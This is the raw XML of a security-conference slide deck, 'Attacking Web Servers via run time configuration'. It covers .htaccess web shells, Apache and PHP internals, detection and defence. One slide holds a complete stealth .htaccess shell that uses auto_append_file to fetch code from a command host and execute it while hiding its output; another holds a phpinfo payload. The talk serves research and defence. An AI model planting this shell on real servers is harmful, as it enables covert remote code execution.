              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>output_buffering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0"/>
              <a:t>=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0"/>
              <a:t>#&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>ob_clean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>phpinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0"/>
              <a:t>();?&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5358005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 stealth shell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9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EE7C8-E4F8-4441-AED0-796EACCD2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434" y="4537917"/>
            <a:ext cx="2445488" cy="35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1147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Started as a CTF idea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Could a .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> file be used to “deface” the flag file regardless of its content?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PHP has a pre script execution stub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Set PHP handlers for relevant non PHP file types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Serve our flag and terminate execution </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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endParaRPr lang="en-AU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endParaRPr lang="en-AU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62024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A while later….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It’s a bad shell idea </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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Pre-execution slows down page loads </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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Accidental output can break headers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>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endParaRPr lang="en-AU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endParaRPr lang="en-AU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61498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Even later….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Post-execution stub?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Keeps connection open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>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>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Accidental output still an issue </a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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endParaRPr lang="en-AU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98965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Much later….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Post-execution stub </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Read buffered output, set length and flush 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>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Accidental output no longer an issue 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>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Use OOB communications </a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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endParaRPr lang="en-AU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61485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1673817" y="0"/>
            <a:ext cx="7470183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AU" sz="1400" b="1" dirty="0"/>
              <a:t>#&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0"/>
              <a:t> go(); ?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>php_value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>auto_append_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0"/>
              <a:t> .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>php_value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>output_buffering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0"/>
              <a:t> 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>IfModule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>lulwat.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0"/>
              <a:t>  &lt;Code "&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0"/>
              <a:t>  $c=@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>file_get_contents</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0"/>
              <a:t>('http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>cnchost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>code.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0"/>
              <a:t>');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0"/>
              <a:t>  $x=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>create_function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0"/>
              <a:t>('',$c); $x();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0"/>
              <a:t>  function go() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>ignore_user_abort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0"/>
              <a:t>(true);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>session_write_close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0"/>
              <a:t>(); $c = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>ob_get_contents</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0"/>
              <a:t>(); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>ob_clean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0"/>
              <a:t>(); echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0"/>
              <a:t>($c, 0, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0"/>
              <a:t>($c)-1);header("Content-Encoding: none");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0"/>
              <a:t>    header("Content-Length: ".</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>ob_get_length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0"/>
              <a:t>());header("Connection: close");</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>ob_end_flush</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0"/>
              <a:t>();flush(); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>ob_start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0"/>
              <a:t>  } ?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0"/>
              <a:t>  "&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0"/>
              <a:t>  &lt;/Code&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>IfModule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0"/>
              <a:t>#&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>ob_clean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0"/>
              <a:t>();exit();?&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17728686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 and improved stealth shell, passive code execution</a:t>
            </a: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7438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372914" cy="635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Audience participation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AU" sz="2000" dirty="0"/>
              <a:t>Go to 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19BBD5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://nazdrowie.justanotherhacker.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="19BBD5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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Put something funny in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>querystring?joke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>=funny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Put your name/twitter for a chance to win a “price”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53602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F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C9FC6-88B2-1B42-8125-6A25F3CFB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434" y="4537917"/>
            <a:ext cx="2445488" cy="35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1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Also known as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Per directory configuration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.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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 err="1"/>
              <a:t>Web.config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Disable if possible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Use server configuration over per directory files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Don’t forget about frameworks/language files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endParaRPr lang="en-AU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3502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Dying breed?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Fewer webservers support run time config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Elastic vs shared hosting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Increasing use of containers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endParaRPr lang="en-AU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endParaRPr lang="en-AU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93104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3052950" y="1784241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br>
              <a:rPr lang="en" sz="8000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="8000" dirty="0" err="1"/>
              <a:t>Dziękuję</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="8000" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr sz="8000" dirty="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3052950" y="3148395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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="545" name="Shape 54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Run time configuration files</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="421" name="Shape 421"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2544287967"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="848763" y="2463292"/>
          <a:ext cx="6462792" cy="1527747"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{34B8D91D-2929-4886-81B1-9E7EC0E3FEB4}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1615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5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8498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Apache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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-AU" dirty="0" err="1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htaccess</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-AU"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i="0" u="none" strike="noStrike" cap="none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IBM</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-AU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HTTP Server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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-AU" dirty="0" err="1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htaccess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630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IIS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i="0" u="none" strike="noStrike" cap="none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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0" err="1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eb.config</a:t>
                      </a:r>
                      <a:endParaRPr lang="en" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none"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i="0" u="none" strike="noStrike" cap="none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PHP</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none"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i="0" u="none" strike="noStrike" cap="none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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0" err="1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user.ini</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none"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619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i="0" u="none" strike="noStrike" cap="none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Oracle </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0" err="1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iPlanet</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-AU" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none"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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0" err="1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htaccess</a:t>
                      </a:r>
                      <a:endParaRPr lang="en" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none"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i="0" u="none" strike="noStrike" cap="none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Arial"/>
                        </a:rPr>
                        <a:t>Erlang </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0" err="1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Arial"/>
                        </a:rPr>
                        <a:t>HTTPd</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none"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i="0" u="none" strike="noStrike" cap="none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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0" err="1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htaccess</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none"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10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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>behaviour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Applications usually designed to a specific configuration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AU" dirty="0"/>
              <a:t>Changing configuration can alter applications functionality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3001381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5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9BBD5"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="3A55D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7399</TotalTime>
  <Words>1789</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>323</Paragraphs>
  <Slides>72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Nixie One</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>Muli</vt:lpstr>
      <vt:lpstr>American Typewriter</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Imogen template</vt:lpstr>
      <vt:lpstr>Attacking Web Servers</vt:lpstr>
      <vt:lpstr>Hello!</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>The story…</vt:lpstr>
      <vt:lpstr>Htshells</vt:lpstr>
      <vt:lpstr>Run time configuration</vt:lpstr>
      <vt:lpstr>Also known as</vt:lpstr>
      <vt:lpstr>Run time configuration files</vt:lpstr>
      <vt:lpstr>Change behaviour</vt:lpstr>
      <vt:lpstr>Apache internals</vt:lpstr>
      <vt:lpstr>Request processing</vt:lpstr>
      <vt:lpstr>Request processing</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Hooks</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Context</vt:lpstr>
      <vt:lpstr>Override</vt:lpstr>
      <vt:lpstr>Lookup</vt:lpstr>
      <vt:lpstr>Abusing run time configuration</vt:lpstr>
      <vt:lpstr>Existing attacks</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Polyglots</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Don’t forget!</vt:lpstr>
      <vt:lpstr>Placing files on servers</vt:lpstr>
      <vt:lpstr>Generic methods</vt:lpstr>
      <vt:lpstr>File upload</vt:lpstr>
      <vt:lpstr>XXE</vt:lpstr>
      <vt:lpstr>Common pitfalls</vt:lpstr>
      <vt:lpstr>Detection and defence</vt:lpstr>
      <vt:lpstr>Anti virus?</vt:lpstr>
      <vt:lpstr>Web Application Firewalls</vt:lpstr>
      <vt:lpstr>Web shell detectors</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>The .htaccess protection method</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>AllowOverride None</vt:lpstr>
      <vt:lpstr>Myth busting</vt:lpstr>
      <vt:lpstr>Uploads outside webroot are safe</vt:lpstr>
      <vt:lpstr>Htaccess file defence</vt:lpstr>
      <vt:lpstr>Story: HumHub</vt:lpstr>
      <vt:lpstr>Humhub</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Changes since release</vt:lpstr>
      <vt:lpstr>New Apache syntax</vt:lpstr>
      <vt:lpstr>Not quite Turing complete</vt:lpstr>
      <vt:lpstr>Dynamic directives</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Updating htshells</vt:lpstr>
      <vt:lpstr>Apache</vt:lpstr>
      <vt:lpstr>IIS</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PHP</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>New stealth shell</vt:lpstr>
      <vt:lpstr>Started as a CTF idea</vt:lpstr>
      <vt:lpstr>A while later….</vt:lpstr>
      <vt:lpstr>Even later….</vt:lpstr>
      <vt:lpstr>Much later….</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>DEMO</vt:lpstr>
      <vt:lpstr>Audience participation</vt:lpstr>
      <vt:lpstr>Conclusion</vt:lpstr>
      <vt:lpstr>Disable if possible</vt:lpstr>
      <vt:lpstr>Dying breed?</vt:lpstr>
      <vt:lpstr>Thanks! Dziękuję!</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Manager/>
  <Company/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Attacking Web Servers via run time configuration</dc:title>
  <dc:subject/>
  <dc:creator>Eldar Marcussen</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Eldar Marcussen</cp:lastModifiedBy>
  <cp:revision>130</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-06-05T13:39:32Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>